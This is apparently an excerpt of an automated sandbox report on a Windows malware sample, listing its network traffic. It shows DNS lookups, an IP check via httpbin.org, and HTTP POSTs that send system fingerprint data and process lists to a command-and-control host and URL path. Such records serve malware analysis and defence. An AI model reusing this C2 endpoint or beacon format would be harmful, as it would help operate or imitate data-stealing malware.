                                  Dec 26, 2024 13:02:29.347342968 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347388983 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347448111 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347520113 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347532034 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347575903 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347629070 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347695112 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347742081 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347899914 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.347912073 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348052979 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348064899 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348139048 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348150015 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348227024 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348237991 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348519087 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348540068 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348633051 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348644018 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.348692894 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350111008 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350245953 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350267887 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350390911 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350403070 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350496054 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350517035 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350584984 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350727081 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350775003 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350786924 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350866079 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.350887060 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351030111 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351041079 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351073980 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351128101 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351175070 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351289988 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351424932 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351437092 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351525068 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351542950 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351584911 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351605892 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351737022 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351749897 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351764917 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351816893 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351830006 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351843119 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351933002 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.351944923 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.352037907 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:29.352050066 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:31.405029058 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:31.405040979 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:31.405131102 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:31.405617952 CET4973080192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:31.525593042 CET8049730185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:31.616194963 CET4973980192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:31.735766888 CET8049739185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:31.737210989 CET4973980192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:31.737637997 CET4973980192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:31.857394934 CET8049739185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:33.275327921 CET8049739185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:33.275803089 CET8049739185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:33.275851965 CET4973980192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:33.283987045 CET4973980192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:33.403445005 CET8049739185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:33.661511898 CET4974480192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:33.781135082 CET8049744185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:33.781263113 CET4974480192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:33.781743050 CET4974480192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:33.901285887 CET8049744185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:35.403192043 CET8049744185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:35.403337955 CET8049744185.121.15.192192.168.2.9
                                  Dec 26, 2024 13:02:35.403454065 CET4974480192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:35.403976917 CET4974480192.168.2.9185.121.15.192
                                  Dec 26, 2024 13:02:35.523394108 CET8049744185.121.15.192192.168.2.9

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 26, 2024 13:02:21.939748049 CET6216253192.168.2.91.1.1.1
                                  Dec 26, 2024 13:02:21.939861059 CET6216253192.168.2.91.1.1.1
                                  Dec 26, 2024 13:02:22.077548981 CET53621621.1.1.1192.168.2.9
                                  Dec 26, 2024 13:02:22.226948977 CET53621621.1.1.1192.168.2.9
                                  Dec 26, 2024 13:02:26.121300936 CET6216553192.168.2.91.1.1.1
                                  Dec 26, 2024 13:02:26.121354103 CET6216553192.168.2.91.1.1.1
                                  Dec 26, 2024 13:02:26.818516970 CET53621651.1.1.1192.168.2.9
                                  Dec 26, 2024 13:02:26.841677904 CET53621651.1.1.1192.168.2.9
                                  Dec 26, 2024 13:02:31.475119114 CET6216753192.168.2.91.1.1.1
                                  Dec 26, 2024 13:02:31.475263119 CET6216753192.168.2.91.1.1.1
                                  Dec 26, 2024 13:02:31.614885092 CET53621671.1.1.1192.168.2.9
                                  Dec 26, 2024 13:02:31.614898920 CET53621671.1.1.1192.168.2.9
                                  Dec 26, 2024 13:02:33.522707939 CET6216953192.168.2.91.1.1.1
                                  Dec 26, 2024 13:02:33.522937059 CET6216953192.168.2.91.1.1.1
                                  Dec 26, 2024 13:02:33.660115004 CET53621691.1.1.1192.168.2.9
                                  Dec 26, 2024 13:02:33.660346985 CET53621691.1.1.1192.168.2.9

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Dec 26, 2024 13:02:21.939748049 CET192.168.2.91.1.1.10x2dc5Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                  Dec 26, 2024 13:02:21.939861059 CET192.168.2.91.1.1.10xe8bStandard query (0)httpbin.org28IN (0x0001)false
                                  Dec 26, 2024 13:02:26.121300936 CET192.168.2.91.1.1.10x424aStandard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                  Dec 26, 2024 13:02:26.121354103 CET192.168.2.91.1.1.10xa3d8Standard query (0)home.twentytk20ht.top28IN (0x0001)false
                                  Dec 26, 2024 13:02:31.475119114 CET192.168.2.91.1.1.10x44b4Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                  Dec 26, 2024 13:02:31.475263119 CET192.168.2.91.1.1.10x5abcStandard query (0)home.twentytk20ht.top28IN (0x0001)false
                                  Dec 26, 2024 13:02:33.522707939 CET192.168.2.91.1.1.10xe5f0Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                  Dec 26, 2024 13:02:33.522937059 CET192.168.2.91.1.1.10xbc68Standard query (0)home.twentytk20ht.top28IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Dec 26, 2024 13:02:14.479337931 CET1.1.1.1192.168.2.90xcd75No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Dec 26, 2024 13:02:14.479337931 CET1.1.1.1192.168.2.90xcd75No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                  Dec 26, 2024 13:02:22.226948977 CET1.1.1.1192.168.2.90x2dc5No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                  Dec 26, 2024 13:02:22.226948977 CET1.1.1.1192.168.2.90x2dc5No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                  Dec 26, 2024 13:02:26.818516970 CET1.1.1.1192.168.2.90x424aNo error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                  Dec 26, 2024 13:02:31.614885092 CET1.1.1.1192.168.2.90x44b4No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                  Dec 26, 2024 13:02:33.660115004 CET1.1.1.1192.168.2.90xe5f0No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • httpbin.org
                                  • home.twentytk20ht.top

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.949730185.121.15.192807576C:\Users\user\Desktop\E6rBvcWFWu.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 26, 2024 13:02:26.964468002 CET12360OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                  Host: home.twentytk20ht.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 501311
                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 32 31 34 35 34 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1735214544", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                  Dec 26, 2024 13:02:27.084285021 CET4944OUTData Raw: 2f 74 65 4b 4f 48 63 6b 6f 59 6a 6e 72 70 30 5c 2f 5a 34 57 70 58 71 77 2b 4b 64 4f 4d 50 65 50 79 44 78 65 2b 6a 4c 34 33 2b 41 32 58 35 50 6d 76 69 76 77 54 5c 2f 71 72 67 4d 2b 78 74 66 4c 73 70 78 48 2b 73 6e 43 4f 65 66 57 38 5a 68 71 43 78
                                  Data Ascii: /teKOHckoYjnrp0\/Z4WpXqw+KdOMPePyDxe+jL43+A2X5PmvivwT\/qrgM+xtfLspxH+snCOefW8ZhqCxNej7PhvPs4rUOShJT58TTo0pfDCcppxODop7LjkdP5Uyv6IPwcKKKKDSn1+X6kLx8h\/f\/P6\/wCfRtWK\/YP\/AIJjfsS\/BD9rXwf8VtT+LEXiwX3gnxH4bsNIn8L+IV0YyWmt6bqVxcRX0c9hqUM3kzaYjWzx
                                  Dec 26, 2024 13:02:27.084424973 CET2472OUTData Raw: 6d 7a 35 33 4d 51 69 5c 2f 65 53 5c 2f 76 38 41 5c 2f 54 42 36 66 35 39 41 4b 44 39 33 37 38 62 70 5c 2f 77 41 74 66 4c 6c 38 6a 50 66 74 6e 38 78 36 66 53 67 41 6b 2b 58 37 36 62 5c 2f 2b 32 76 4a 5c 2f 7a 7a 56 61 4f 54 79 39 5c 2f 77 43 2b 33
                                  Data Ascii: mz53MQi\/eS\/v8A\/TB6f59AKD9378bp\/wAtfLl8jPftn8x6fSgAk+X76b\/+2vJ\/zzVaOTy9\/wC+3\/T9xB7\/AOTx9astsb\/Yf\/lrx+WT9P8A6\/eov9Xv2PJ5P\/kD\/P0NB0EfmF9iPx6+X\/jz\/nmhw\/pH1\/1jyjyPp64p7Ru+xH+\/5v7q5\/1H+ffP\/wBeom+86O\/\/AG0\/CgCBYz\/ATvEZPmSf+2lp
                                  Dec 26, 2024 13:02:27.084518909 CET4944OUTData Raw: 76 43 79 7a 51 58 75 72 74 45 38 4c 61 68 64 53 61 62 6f 45 46 31 5a 58 47 72 78 33 39 70 37 62 2b 79 42 5c 2f 77 55 5a 2b 46 58 37 51 50 37 4b 6d 75 5c 2f 48 6e 78 7a 72 57 6b 65 43 64 63 2b 44 2b 68 73 66 6a 35 6f 2b 39 5c 2f 4c 38 4f 61 6c 59
                                  Data Ascii: vCyzQXurtE8LahdSaboEF1ZXGrx39p7b+yB\/wUZ+FX7QP7Kmu\/HnxzrWkeCdc+D+hsfj5o+9\/L8OalYWT3Ca3o9iWm1C60HxkkD3PhWCIXd1PqbXfhWCbUdW0qdpf8+c14Bz7C5TmPFWXeGmX4vhSlxhjOEsBj1X4rr4vFYqnjamCws1hqPEcalajWxMIZdHGUqCwtTNJfUKbjiJKiv8AVzKfEDIMXm2XcK5h4mZjheLKvB+
                                  Dec 26, 2024 13:02:27.084542036 CET2472OUTData Raw: 33 65 62 4a 35 69 4a 49 6e 5c 2f 4c 58 5c 2f 56 65 66 30 78 5c 2f 50 72 5c 2f 6e 68 6e 2b 72 33 5c 2f 50 76 35 5c 2f 77 42 58 35 76 6e 77 66 35 48 59 2b 76 53 6c 32 5c 2f 76 4d 66 77 5c 2f 38 2b 5c 2f 66 5c 2f 41 44 6a 39 65 33 61 6e 4e 38 32 2b
                                  Data Ascii: 3ebJ5iJIn\/LX\/Vef0x\/Pr\/nhn+r3\/Pv5\/wBX5vnwf5HY+vSl2\/vMfw\/8+\/f\/ADj9e3anN82+F3KfZ\/3WP8\/nQdAz\/XRvv+5H+9P9P8\/nVZZfMZ\/m8tI\/+Wnm\/wCv\/wA9+eKmk8yP5P8An3xNF5fM+f8APXvTJN+53\/jyIsRzf6nn0oAZ+88yb9z8n\/LLjz4P89vf1oXZJG\/8L\/6P5X739xN+f\/L8
                                  Dec 26, 2024 13:02:27.084629059 CET4944OUTData Raw: 54 71 71 55 5a 30 33 68 63 70 77 6c 62 45 77 6c 43 56 75 58 6c 78 32 4a 78 61 74 73 5c 2f 69 33 6b 78 6d 77 65 5c 2f 38 41 6e 38 4b 59 5c 2f 77 42 34 5c 2f 68 5c 2f 49 56 4e 54 4f 37 5c 2f 51 66 79 72 39 73 50 35 5c 2f 49 71 4b 4b 66 73 50 74 5c
                                  Data Ascii: TqqUZ03hcpwlbEwlCVuXlx2Jxats\/i3kxmwe\/8An8KY\/wB4\/h\/IVNTO7\/Qfyr9sP5\/IqKKfsPt\/n8KAP7XriXnr3\/r9ev69cV8oajLnxX4kP\/Uw6z+O7UbrH5H619D6R4k0TxTpOl+IvDmrafrug6xbQ3+l6tpd1DfafqFnMN0dxa3UDvFNGwyCVY4cFW2sGA\/LOx\/bZ\/Zwa4mu9Q+JpNxczyXNxI3g\/wAfO0
                                  Dec 26, 2024 13:02:27.084677935 CET4944OUTData Raw: 41 4a 48 54 46 58 5c 2f 33 6b 65 7a 65 64 6a 2b 56 36 5c 2f 35 5c 2f 7a 69 6f 5a 49 55 32 76 38 6d 5c 2f 6a 5c 2f 56 2b 64 2b 5a 5c 2f 44 74 78 36 56 50 4f 5c 2f 4c 2b 76 6d 64 68 54 2b 52 74 6e 38 59 5c 2f 6e 5c 2f 58 5c 2f 4a 36 39 31 6b 5c 2f
                                  Data Ascii: AJHTFX\/3kezedj+V6\/5\/zioZIU2v8m\/j\/V+d+Z\/Dtx6VPO\/L+vmdhT+Rtn8Y\/n\/X\/J691k\/vb4\/3ko82T\/OKdnG9f+eX\/wBamY\/du+7e\/m\/p\/L\/H61qa868\/6+Yw8rvSaNP+WPl\/4f1\/pTG3+Z\/feP8A55\/5\/HvU2Mb8P\/27+Vnyf5e\/+TTJPLXZ\/rPM7xx8dP8AP\/16Cyt3KFN6Y\/1n+
                                  Dec 26, 2024 13:02:27.204343081 CET2472OUTData Raw: 2f 74 58 36 68 38 43 39 48 38 53 5c 2f 45 65 7a 2b 4c 46 68 38 46 4e 64 2b 48 6d 6b 5c 2f 46 69 35 31 36 43 58 78 68 38 49 76 43 58 77 71 38 54 61 78 34 61 2b 48 4f 72 70 34 75 38 52 2b 44 5c 2f 42 48 78 53 38 55 65 4c 59 64 44 30 37 57 37 5c 2f
                                  Data Ascii: /tX6h8C9H8S\/Eez+LFh8FNd+Hmk\/Fi516CXxh8IvCXwq8Tax4a+HOrp4u8R+D\/BHxS8UeLYdD07W7\/SNF1m30XUntvscR41eGuEk44jjHLqUY4mvhHXlDHfU1WwixP17\/bVg3g\/ZZb9SxqzTEe3+r5XLB4qOYVcNLD1lD5XCfR98ZMdBzwnAWbV5rCUsa8LGtlyzCOHxMsHHAuWWSxscwjWzN5hgP7IwzwqxObrHYR5ZR
                                  Dec 26, 2024 13:02:27.204432011 CET2472OUTData Raw: 74 76 66 44 64 37 34 6c 30 36 53 2b 74 76 37 4f 4e 78 66 77 56 5c 2f 47 64 78 34 63 38 47 2b 4c 4c 37 77 46 48 38 53 5c 2f 68 5a 34 31 38 65 65 46 5c 2f 46 32 6f 5c 2f 44 5c 2f 77 43 4b 48 67 58 77 4e 72 48 6a 6d 35 38 55 5c 2f 43 54 78 7a 6f 5c
                                  Data Ascii: tvfDd74l06S+tv7ONxfwV\/Gdx4c8G+LL7wFH8S\/hZ418eeF\/F2o\/D\/wCKHgXwNrHjm58U\/CTxzo\/mQ6r4Z8X\/APCXfDjwZ4Y8QS6fqlnq+iXWvfCbxR8S\/B0Wq6Ncxt4lFrqHh+71r9hyvxe8Ns6x+GyvKuLMvxuY4zGYvA4bB0aeNderXwNSlRxbUJYWLjhsPXr4fDVMbPlwaxeIoYT6w8TWpUp\/h2a+BXi3w\/l
                                  Dec 26, 2024 13:02:27.204485893 CET2472OUTData Raw: 32 6e 6c 2b 50 5c 2f 41 41 43 42 2b 76 34 55 79 72 46 52 62 44 37 66 35 5c 2f 43 67 37 43 70 54 48 36 66 6a 5c 2f 51 31 50 35 54 2b 6e 36 48 5c 2f 43 6d 62 48 39 76 79 5c 2f 2b 79 6f 4e 4b 66 58 2b 76 36 5c 2f 34 59 72 55 56 4b 5c 2f 54 38 66 36
                                  Data Ascii: 2nl+P\/AACB+v4UyrFRbD7f5\/Cg7CpTH6fj\/Q1P5T+n6H\/CmbH9vy\/+yoNKfX+v6\/4YrUVK\/T8f6GoqDQifr+H9TTKkk7fj\/So6DT2nl+P\/AACOTt+P9KjqxUGx\/b8v\/sqDo9p5fj\/wCF+v4f1NQsu7+X1qw\/T8f6Gm4f3\/AD\/+vW3v\/wB38TQp7fL\/AEOf5UtSydE+h\/nUVUd3v\/3fxIZe\/wDu\/wCN
                                  Dec 26, 2024 13:02:27.204504967 CET2472OUTData Raw: 7a 50 6c 66 65 2b 39 5c 2f 2b 57 4d 6a 6a 5c 2f 55 5c 2f 35 50 65 67 6c 46 5a 76 4a 38 76 38 41 36 35 79 66 38 74 68 39 66 35 31 50 69 52 66 37 38 4b 66 36 30 52 2b 62 35 5c 2f 38 41 6f 5c 2f 38 41 53 71 39 5c 2f 2b 37 2b 4a 52 42 4a 2b 38 35 5c
                                  Data Ascii: zPlfe+9\/+WMjj\/U\/5PeglFZvJ8v8A65yf8th9f51PiRf78Kf60R+b5\/8Ao\/8ASq9\/+7+JRBJ+85\/5bD7RL\/zw\/wCXr8Ov8vxFM8vLP5Pyf78vrz\/n\/Cpvk8xGT5P3f\/LT\/XxW\/P8A9f6e1QyL5rb9kb5jP7uTP+f8+1Hv\/wB38QIf+Wb\/APkTp\/26df8AP44pn8W3\/XQ+b\/zy\/wBQev8An696ueZM0j
                                  Dec 26, 2024 13:02:31.405029058 CET157INHTTP/1.1 200 OK
                                  Server: nginx/1.22.1
                                  Date: Thu, 26 Dec 2024 12:02:31 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 1
                                  Connection: close
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.949739185.121.15.192807576C:\Users\user\Desktop\E6rBvcWFWu.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 26, 2024 13:02:31.737637997 CET101OUTGET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1
                                  Host: home.twentytk20ht.top
                                  Accept: */*
                                  Dec 26, 2024 13:02:33.275327921 CET372INHTTP/1.1 404 NOT FOUND
                                  Server: nginx/1.22.1
                                  Date: Thu, 26 Dec 2024 12:02:33 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 207
                                  Connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.949744185.121.15.192807576C:\Users\user\Desktop\E6rBvcWFWu.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 26, 2024 13:02:33.781743050 CET174OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                  Host: home.twentytk20ht.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                  Data Ascii: { "id1": "0", "data": "Done1" }
                                  Dec 26, 2024 13:02:35.403192043 CET372INHTTP/1.1 404 NOT FOUND
                                  Server: nginx/1.22.1
                                  Date: Thu, 26 Dec 2024 12:02:35 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 207
                                  Connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.9497193.218.7.1034437576C:\Users\user\Desktop\E6rBvcWFWu.exe
                                  TimestampBytes transferredDirectionData
                                  2024-12-26 12:02:24 UTC52OUTGET /ip HTTP/1.1
                                  Host: httpbin.org
                                  Accept: */*
                                  2024-12-26 12:02:25 UTC224INHTTP/1.1 200 OK
                                  Date: Thu, 26 Dec 2024 12:02:24 GMT
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Connection: close
                                  Server: gunicorn/19.9.0
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Credentials: true
                                  2024-12-26 12:02:25 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                  Data Ascii: { "origin": "8.46.123.189"}


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:07:02:19
                                  Start date:26/12/2024
                                  Path:C:\Users\user\Desktop\E6rBvcWFWu.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\E6rBvcWFWu.exe"
                                  Imagebase:0x670000
                                  File size:4'478'464 bytes
                                  MD5 hash:B6BF5FB735BF9B5B70A90D2C7EEB2996
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3.8%
                                    Dynamic/Decrypted Code Coverage:35.6%
                                    Signature Coverage:9.8%
                                    Total number of Nodes:399
                                    Total number of Limit Nodes:46
